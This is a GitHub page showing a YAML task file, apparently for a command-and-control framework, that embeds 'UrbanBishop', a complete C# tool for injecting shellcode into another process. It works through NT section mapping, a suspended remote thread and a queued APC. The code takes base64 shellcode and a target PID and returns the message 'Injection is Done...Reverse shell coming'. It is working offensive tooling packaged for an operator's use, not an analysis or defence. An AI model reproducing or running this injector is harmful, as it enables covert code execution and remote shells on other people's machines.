-
Notifications
You must be signed in to change notification settings - Fork 27
/
Copy pathUrbanBishop.yaml
106 lines (106 loc) · 24.3 KB
/
UrbanBishop.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
- Name: UrbanBishop
Aliases: []
Author:
Name: ''
Handle: ''
Link: ''
Description: A method of injection QueueAPC {@FuzzySecurity} Main One
Help:
Language: CSharp
CompatibleDotNetVersions:
- Net35
- Net40
Code: "using System;\nusing System.Diagnostics;\nusing System.Runtime.InteropServices;\nusing System.Text.RegularExpressions;\nusing System.IO;\n\n\npublic static class Task\n{\n // Structs\n //-----------------------------------\n [StructLayout(LayoutKind.Sequential)]\n public struct PROC_VALIDATION\n {\n public Boolean isvalid;\n public String sName;\n public IntPtr hProc;\n public IntPtr pNtllBase;\n public Boolean isWow64;\n }\n\n [StructLayout(LayoutKind.Sequential)]\n public struct SC_DATA\n {\n public UInt32 iSize;\n public byte[] bScData;\n }\n\n [StructLayout(LayoutKind.Sequential)]\n public struct SECT_DATA\n {\n public Boolean isvalid;\n public IntPtr hSection;\n public IntPtr pBase;\n }\n\n [StructLayout(LayoutKind.Sequential)]\n public struct UNICODE_STRING\n {\n public UInt16 Length;\n public UInt16 MaximumLength;\n public IntPtr Buffer;\n }\n\n [StructLayout(LayoutKind.Sequential)]\n public struct ANSI_STRING\n {\n public UInt16 Length;\n public UInt16 MaximumLength;\n public IntPtr Buffer;\n }\n\n [StructLayout(LayoutKind.Sequential)]\n public struct CLIENT_ID\n {\n public IntPtr UniqueProcess;\n public IntPtr UniqueThread;\n }\n\n [StructLayout(LayoutKind.Sequential)]\n public class THREAD_BASIC_INFORMATION\n {\n public UInt32 ExitStatus;\n public IntPtr TebBaseAddress;\n public CLIENT_ID ClientId;\n public UIntPtr AffinityMask;\n public int Priority;\n public int BasePriority;\n }\n\n [StructLayout(LayoutKind.Sequential, Pack = 0)]\n public struct OBJECT_ATTRIBUTES\n {\n public Int32 Length;\n public IntPtr RootDirectory;\n public IntPtr ObjectName;\n public uint Attributes;\n public IntPtr SecurityDescriptor;\n public IntPtr SecurityQualityOfService;\n }\n\n // APIs\n //-----------------------------------\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 NtOpenProcess(\n ref IntPtr ProcessHandle,\n UInt32 DesiredAccess,\n ref OBJECT_ATTRIBUTES ObjectAttributes,\n ref CLIENT_ID ClientId);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 NtQueryInformationProcess(\n IntPtr processHandle,\n UInt32 processInformationClass,\n ref ulong processInformation,\n int processInformationLength,\n ref UInt32 returnLength);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 NtCreateSection(\n ref IntPtr section,\n UInt32 desiredAccess,\n IntPtr pAttrs,\n ref long MaxSize,\n uint pageProt,\n uint allocationAttribs,\n IntPtr hFile);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 NtMapViewOfSection(\n IntPtr SectionHandle,\n IntPtr ProcessHandle,\n ref IntPtr BaseAddress,\n IntPtr ZeroBits,\n IntPtr CommitSize,\n ref long SectionOffset,\n ref long ViewSize,\n uint InheritDisposition,\n uint AllocationType,\n uint Win32Protect);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 NtUnmapViewOfSection(\n IntPtr ProcessHandle,\n IntPtr BaseAddress);\n\n // Not used but for ref in case of\n // NtOpenThread -> NtQueueApcThread\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 NtOpenThread(\n IntPtr ThreadHandle,\n UInt32 DesiredAccess,\n ref OBJECT_ATTRIBUTES ObjectAttributes,\n IntPtr ClientId);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 NtQueueApcThread(\n IntPtr ThreadHandle,\n IntPtr ApcRoutine,\n IntPtr ApcArgument1,\n IntPtr ApcArgument2,\n IntPtr ApcArgument3);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 NtCreateThreadEx(\n ref IntPtr hThread,\n UInt32 DesiredAccess,\n IntPtr ObjectAttributes,\n IntPtr ProcessHandle,\n IntPtr lpStartAddress,\n IntPtr lpParameter,\n bool CreateSuspended,\n UInt32 StackZeroBits,\n UInt32 SizeOfStackCommit,\n UInt32 SizeOfStackReserve,\n IntPtr lpBytesBuffer);\n\n [DllImport(\"ntdll.dll\")]\n public static extern void RtlInitUnicodeString(\n ref UNICODE_STRING DestinationString,\n [MarshalAs(UnmanagedType.LPWStr)]\n string SourceString);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 RtlUnicodeStringToAnsiString(\n ref ANSI_STRING DestinationString,\n ref UNICODE_STRING SourceString,\n bool AllocateDestinationString);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 LdrGetDllHandle(\n IntPtr DllPath,\n IntPtr DllCharacteristics,\n ref UNICODE_STRING DllName,\n ref IntPtr DllHandle);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 LdrGetProcedureAddress(\n IntPtr hModule,\n ref ANSI_STRING ModName,\n UInt32 Ordinal,\n ref IntPtr FunctionAddress);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 NtAlertResumeThread(\n IntPtr ThreadHandle,\n ref UInt32 PreviousSuspendCount);\n\n [DllImport(\"ntdll.dll\")]\n public static extern UInt32 NtQueryInformationThread(\n IntPtr ThreadHandle,\n int ThreadInformationClass,\n IntPtr ThreadInformation,\n int ThreadInformationLength,\n ref int ReturnLength);\n\n\n\n public static void CastleKingside(String Path, PROC_VALIDATION Pv, Int32 ProcId, Boolean Clean)\n {\n // Read in sc bytes\n SC_DATA scd = ReadShellcode(Path);\n if (scd.iSize == 0)\n {\n ////Console.WriteLine(\"[!] Unable to read shellcode bytes..\");\n return;\n }\n\n // Create local section & map view of that section as RW in our process\n ////Console.WriteLine(\"\\n[>] Creating local section..\");\n SECT_DATA LocalSect = MapLocalSection(scd.iSize);\n if (!LocalSect.isvalid)\n {\n return;\n }\n\n // Map section into remote process\n ////Console.WriteLine(\"[>] Map RX section to remote proc..\");\n SECT_DATA RemoteSect = MapRemoteSection(Pv.hProc, LocalSect.hSection, scd.iSize);\n if (!RemoteSect.isvalid)\n {\n return;\n }\n\n // Write sc to local section\n ////Console.WriteLine(\"[>] Write shellcode to local section..\");\n ////Console.WriteLine(\" |-> Size: \" + scd.iSize);\n Marshal.Copy(scd.bScData, 0, LocalSect.pBase, (int)scd.iSize);\n\n\n // Find remote thread start address offset from base -> RtlExitUserThread\n ////Console.WriteLine(\"[>] Seek export offset..\");\n ////Console.WriteLine(\" |-> pRemoteNtDllBase: 0x\" + String.Format(\"{0:X}\", (Pv.pNtllBase).ToInt64()));\n IntPtr pFucOffset = GetLocalExportOffset(\"ntdll.dll\", \"RtlExitUserThread\");\n if (pFucOffset == IntPtr.Zero)\n {\n return;\n }\n\n // Create suspended thread at RtlExitUserThread in remote proc\n ////Console.WriteLine(\"[>] NtCreateThreadEx -> RtlExitUserThread <- Suspended..\");\n IntPtr hRemoteThread = IntPtr.Zero;\n IntPtr pRemoteStartAddress = (IntPtr)((Int64)Pv.pNtllBase + (Int64)pFucOffset);\n UInt32 CallResult = NtCreateThreadEx(ref hRemoteThread, 0x1FFFFF, IntPtr.Zero, Pv.hProc, pRemoteStartAddress, IntPtr.Zero, true, 0, 0xffff, 0xffff, IntPtr.Zero);\n if (hRemoteThread == IntPtr.Zero)\n {\n //Console.WriteLine(\"[!] Failed to create remote thread..\");\n return;\n } else\n {\n //Console.WriteLine(\" |-> Success\");\n }\n\n // Queue APC\n //Console.WriteLine(\"[>] Set APC trigger & resume thread..\");\n CallResult = NtQueueApcThread(hRemoteThread, RemoteSect.pBase, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);\n if (CallResult == 0)\n {\n //Console.WriteLine(\" |-> NtQueueApcThread\");\n } else\n {\n //Console.WriteLine(\"[!] Unable register APC..\");\n return;\n }\n\n // Resume thread\n UInt32 SuspendCount = 0;\n CallResult = NtAlertResumeThread(hRemoteThread, ref SuspendCount);\n if (CallResult == 0)\n {\n //Console.WriteLine(\" |-> NtAlertResumeThread\");\n } else\n {\n //Console.WriteLine(\"[!] Failed to resume thread..\");\n }\n\n // Wait & clean up?\n if (Clean)\n {\n //Console.WriteLine(\"[>] Waiting for payload to finish..\");\n while (true)\n {\n THREAD_BASIC_INFORMATION ts = GetThreadState(hRemoteThread);\n if (ts.ExitStatus != 259) // STILL_ACTIVE\n {\n //Console.WriteLine(\" |-> Thread exit status -> \" + ts.ExitStatus);\n UInt32 Unmap = NtUnmapViewOfSection(Pv.hProc, RemoteSect.pBase);\n if (Unmap == 0)\n {\n //Console.WriteLine(\" |-> NtUnmapViewOfSection\");\n } else\n {\n //Console.WriteLine(\"[!] Failed to unmap remote section..\");\n }\n break;\n }\n System.Threading.Thread.Sleep(400); // Sleep precious, sleep\n }\n }\n }\n\n private static int FindProcessPid(string process)\n {\n int pid = 0;\n int session = Process.GetCurrentProcess().SessionId;\n Process[] processes = Process.GetProcessesByName(process);\n\n foreach (Process proc in processes)\n {\n if (proc.SessionId == session)\n {\n pid = proc.Id;\n }\n }\n\n return pid;\n }\n\n public static string Execute(String Path, String ProcID)\n {\n //Process p = new Process();\n //p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;\n // p.StartInfo.FileName = @\"C:\\Windows\\System32\\notepad.exe\";\n //p.StartInfo.FileName = @\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\";\n //p.Start();\n //int pid = FindProcessPid(\"explorer\");\n //int pid = Int32.parse(ProcID);\n //int pid = p.Id;\n int pid = Convert.ToInt32(ProcID);\n \n //int iPathScBin = Array.FindIndex(args, s => new Regex(@\"(?i)(-|--|/)(p|Path)$\").Match(s).Success);\n int iPID = pid;\n //int bClean = Array.FindIndex(args, s => new Regex(@\"(?i)(-|--|/)(c|Clean)$\").Match(s).Success);\n //int bClean = 0;\n Boolean Clean = true;\n String sPathScBin = Path;\n Int32 Proc = iPID;\n PROC_VALIDATION pv = ValidateProc(Proc);\n \n CastleKingside(sPathScBin, pv, Proc, Clean);\n \n return \"Injection is Done...Reverse shell coming\";\n \n }\n\n // Helpers\n //-----------------------------------\n public static void GetHelp()\n {\n //Console.WriteLine(\"[!] Missing arguments..\\n\");\n //Console.WriteLine(\" -p (--Path) Full path to the shellcode binary file\");\n //Console.WriteLine(\" -i (--Inject) PID to inject\");\n //Console.WriteLine(\" -c (--Clean) Optional, wait for payload to exit and clean up\");\n }\n\n // Banner\n //-----------------------------------\n public static void PrintBanner()\n {\n //Console.WriteLine(\" _O _____ _ \");\n //Console.WriteLine(\" / //\\\\ | | |___| |_ ___ ___ \");\n //Console.WriteLine(\" { } | | | _| . | .'| | \");\n //Console.WriteLine(\" \\\\___/ |_____|_| |___|__,|_|_| \");\n //Console.WriteLine(\" (___) \");\n //Console.WriteLine(\" |_| _____ _ _ \");\n //Console.WriteLine(\" / \\\\ | __ |_|___| |_ ___ ___ \");\n //Console.WriteLine(\" (_____) | __ -| |_ -| | . | . | \");\n //Console.WriteLine(\"(_______) |_____|_|___|_|_|___| _| \");\n //Console.WriteLine(\"/_______\\\\ |_| \");\n //Console.WriteLine(\" ~b33f~ \\n\");\n }\n\n public static Boolean PathIsFile(String Path)\n {\n try\n {\n FileAttributes CheckAttrib = File.GetAttributes(Path);\n if ((CheckAttrib & FileAttributes.Directory) == FileAttributes.Directory)\n {\n //Console.WriteLine(\"[!] Please specify a file path not a folder path (-p|--Path)\");\n return false;\n }\n } catch\n {\n //Console.WriteLine(\"[!] Invalid shellcode bin file path specified (-p|--Path)\");\n return false;\n }\n return true;\n }\n\n public static IntPtr GetProcessHandle(Int32 ProcId)\n {\n IntPtr hProc = IntPtr.Zero;\n OBJECT_ATTRIBUTES oa = new OBJECT_ATTRIBUTES();\n CLIENT_ID ci = new CLIENT_ID();\n ci.UniqueProcess = (IntPtr)ProcId;\n UInt32 CallResult = NtOpenProcess(ref hProc, 0x1F0FFF, ref oa, ref ci);\n return hProc;\n }\n\n public static PROC_VALIDATION ValidateProc(Int32 ProcId)\n {\n PROC_VALIDATION Pv = new PROC_VALIDATION();\n\n try\n {\n Process Proc = Process.GetProcessById(ProcId);\n ProcessModuleCollection ProcModColl = Proc.Modules;\n foreach (ProcessModule Module in ProcModColl)\n {\n if (Module.FileName.EndsWith(\"ntdll.dll\"))\n {\n Pv.pNtllBase = Module.BaseAddress;\n }\n }\n Pv.isvalid = true;\n Pv.sName = Proc.ProcessName;\n Pv.hProc = GetProcessHandle(ProcId);\n ulong isWow64 = 0;\n uint RetLen = 0;\n NtQueryInformationProcess(Pv.hProc, 26, ref isWow64, Marshal.SizeOf(isWow64), ref RetLen);\n if (isWow64 == 0)\n {\n Pv.isWow64 = false;\n } else\n {\n Pv.isWow64 = true;\n }\n }\n catch\n {\n Pv.isvalid = false;\n }\n\n return Pv;\n }\n\n public static SC_DATA ReadShellcode(String Path)\n {\n \n //Path = @\"\";\n \n SC_DATA scd = new SC_DATA();\n try\n {\n scd.bScData = Convert.FromBase64String(Path);\n scd.iSize = (uint)scd.bScData.Length;\n } catch { }\n\n return scd;\n }\n\n public static SECT_DATA MapLocalSection(long ScSize)\n {\n SECT_DATA SectData = new SECT_DATA();\n\n long MaxSize = ScSize;\n IntPtr hSection = IntPtr.Zero;\n UInt32 CallResult = NtCreateSection(ref hSection, 0xe, IntPtr.Zero, ref MaxSize, 0x40, 0x8000000, IntPtr.Zero);\n if (CallResult == 0 && hSection != IntPtr.Zero)\n {\n //Console.WriteLine(\" |-> hSection: 0x\" + String.Format(\"{0:X}\", (hSection).ToInt64()));\n //Console.WriteLine(\" |-> Size: \" + ScSize);\n SectData.hSection = hSection;\n } else\n {\n //Console.WriteLine(\"[!] Failed to create section..\");\n SectData.isvalid = false;\n return SectData;\n }\n\n IntPtr pScBase = IntPtr.Zero;\n long lSecOffset = 0;\n CallResult = NtMapViewOfSection(hSection, (IntPtr)(-1), ref pScBase, IntPtr.Zero, IntPtr.Zero, ref lSecOffset, ref MaxSize, 0x2, 0, 0x4);\n if (CallResult == 0 && pScBase != IntPtr.Zero)\n {\n //Console.WriteLine(\" |-> pBase: 0x\" + String.Format(\"{0:X}\", (pScBase).ToInt64()));\n SectData.pBase = pScBase;\n } else\n {\n //Console.WriteLine(\"[!] Failed to map section locally..\");\n SectData.isvalid = false;\n return SectData;\n }\n\n SectData.isvalid = true;\n return SectData;\n }\n\n public static SECT_DATA MapRemoteSection(IntPtr hProc, IntPtr hSection, long ScSize)\n {\n SECT_DATA SectData = new SECT_DATA();\n\n IntPtr pScBase = IntPtr.Zero;\n long lSecOffset = 0;\n long MaxSize = ScSize;\n UInt32 CallResult = NtMapViewOfSection(hSection, hProc, ref pScBase, IntPtr.Zero, IntPtr.Zero, ref lSecOffset, ref MaxSize, 0x2, 0, 0x20);\n if (CallResult == 0 && pScBase != IntPtr.Zero)\n {\n //Console.WriteLine(\" |-> pRemoteBase: 0x\" + String.Format(\"{0:X}\", (pScBase).ToInt64()));\n SectData.pBase = pScBase;\n }\n else\n {\n //Console.WriteLine(\"[!] Failed to map section in remote process..\");\n SectData.isvalid = false;\n return SectData;\n }\n\n SectData.isvalid = true;\n return SectData;\n }\n\n public static IntPtr GetLocalExportOffset(String Module, String Export)\n {\n UNICODE_STRING uModuleName = new UNICODE_STRING();\n RtlInitUnicodeString(ref uModuleName, Module);\n IntPtr hModule = IntPtr.Zero;\n UInt32 CallResult = LdrGetDllHandle(IntPtr.Zero, IntPtr.Zero, ref uModuleName, ref hModule);\n if (CallResult != 0 || hModule == IntPtr.Zero)\n {\n //Console.WriteLine(\"[!] Failed to get \" + Module + \" handle..\");\n return IntPtr.Zero;\n } else\n {\n //Console.WriteLine(\" |-> LdrGetDllHandle OK\");\n }\n\n // Hey MSFT, why is RtlInitAnsiString not working on Win7..?\n UNICODE_STRING uFuncName = new UNICODE_STRING();\n RtlInitUnicodeString(ref uFuncName, Export);\n ANSI_STRING aFuncName = new ANSI_STRING();\n RtlUnicodeStringToAnsiString(ref aFuncName, ref uFuncName, true);\n IntPtr pExport = IntPtr.Zero;\n CallResult = LdrGetProcedureAddress(hModule, ref aFuncName, 0, ref pExport);\n \n if (CallResult != 0 || pExport == IntPtr.Zero)\n {\n //Console.WriteLine(\"[!] Failed to get \" + Export + \" address..\");\n return IntPtr.Zero;\n }\n else\n {\n //Console.WriteLine(\" |-> \" + Export + \": 0x\" + String.Format(\"{0:X}\", (pExport).ToInt64()));\n }\n\n IntPtr FuncOffset = (IntPtr)((Int64)(pExport) - (Int64)(hModule));\n //Console.WriteLine(\" |-> Offset: 0x\" + String.Format(\"{0:X}\", (FuncOffset).ToInt64()));\n\n return FuncOffset;\n }\n\n public static THREAD_BASIC_INFORMATION GetThreadState(IntPtr hThread)\n {\n THREAD_BASIC_INFORMATION ts = new THREAD_BASIC_INFORMATION();\n IntPtr BuffPtr = Marshal.AllocHGlobal(Marshal.SizeOf(ts));\n int RetLen = 0;\n UInt32 CallResult = NtQueryInformationThread(hThread, 0, BuffPtr, Marshal.SizeOf(ts), ref RetLen);\n if (CallResult != 0)\n {\n //Console.WriteLine(\"[!] Failed to query thread information..\");\n return ts;\n }\n\n // Ptr to struct\n ts = (THREAD_BASIC_INFORMATION)Marshal.PtrToStructure(BuffPtr, typeof(THREAD_BASIC_INFORMATION));\n\n return ts;\n }\n}\n\n"
TaskingType: Assembly
UnsafeCompile: false
TokenTask: false
Options:
- Name: Path
DefaultValue: ''
Description: Path to payload .bin file
SuggestedValues: []
Optional: false
DisplayInCommand: false
FileOption: true
- Name: ProcID
DefaultValue: ''
Description: Process ID of target process
SuggestedValues: []
Optional: false
DisplayInCommand: true
FileOption: false
ReferenceSourceLibraries: []
ReferenceAssemblies:
- Name: System.Configuration.Install.dll
Location: net35/System.Configuration.Install.dll
DotNetVersion: Net35
- Name: System.Drawing.dll
Location: net40/System.Drawing.dll
DotNetVersion: Net40
- Name: System.Data.DataSetExtensions.dll
Location: net40/System.Data.DataSetExtensions.dll
DotNetVersion: Net40
- Name: System.ServiceProcess.dll
Location: net40/System.ServiceProcess.dll
DotNetVersion: Net40
- Name: System.Core.dll
Location: net40/System.Core.dll
DotNetVersion: Net40
- Name: System.dll
Location: net40/System.dll
DotNetVersion: Net40
- Name: System.XML.dll
Location: net40/System.XML.dll
DotNetVersion: Net40
- Name: System.Configuration.Install.dll
Location: net40/System.Configuration.Install.dll
DotNetVersion: Net40
- Name: mscorlib.dll
Location: net40/mscorlib.dll
DotNetVersion: Net40
- Name: System.Data.dll
Location: net35/System.Data.dll
DotNetVersion: Net35
- Name: System.ServiceProcess.dll
Location: net35/System.ServiceProcess.dll
DotNetVersion: Net35
- Name: System.DirectoryServices.Protocols.dll
Location: net35/System.DirectoryServices.Protocols.dll
DotNetVersion: Net35
- Name: System.Data.DataSetExtensions.dll
Location: net35/System.Data.DataSetExtensions.dll
DotNetVersion: Net35
- Name: System.Drawing.dll
Location: net35/System.Drawing.dll
DotNetVersion: Net35
- Name: System.Web.Extensions.dll
Location: net35/System.Web.Extensions.dll
DotNetVersion: Net35
- Name: mscorlib.dll
Location: net35/mscorlib.dll
DotNetVersion: Net35
- Name: System.Core.dll
Location: net35/System.Core.dll
DotNetVersion: Net35
- Name: System.Security.dll
Location: net35/System.Security.dll
DotNetVersion: Net35
- Name: System.dll
Location: net35/System.dll
DotNetVersion: Net35
- Name: System.IdentityModel.dll
Location: net35/System.IdentityModel.dll
DotNetVersion: Net35
- Name: System.XML.dll
Location: net35/System.XML.dll
DotNetVersion: Net35
- Name: System.DirectoryServices.AccountManagement.dll
Location: net35/System.DirectoryServices.AccountManagement.dll
DotNetVersion: Net35
- Name: System.Data.dll
Location: net40/System.Data.dll
DotNetVersion: Net40
- Name: System.Management.dll
Location: net40/System.Management.dll
DotNetVersion: Net40
EmbeddedResources: []